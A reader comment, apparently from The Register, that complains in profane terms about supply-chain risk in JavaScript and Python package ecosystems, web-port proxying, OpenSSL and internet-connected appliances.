    Java script, and the way it's distributed with people able to remove infrastructure with no notice and also people able to upload malicious infrastructure into your eco system should scares the bejesus out of everybody. But move fast and break things they said. The web is the future...where you let anyone or anything into your home without knowing.

    Same goes for Python and PIP and the rest of the shitty fucking web repo's that everyone relies, on. Its like a giant attack vector into your system, but all through HTTP and HTTPS which can't be bad right? Be block every port., but then just proxy everything through the fucking web ports as they can't be evil right.

    It's like people have learned nothing. You know how like half the web was built on Open SSL, which was a steaming pile of shit. Well wait until the horrors of Web 2.0 get realised and you fucking internet enabled fridge or oven tries to kill you.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like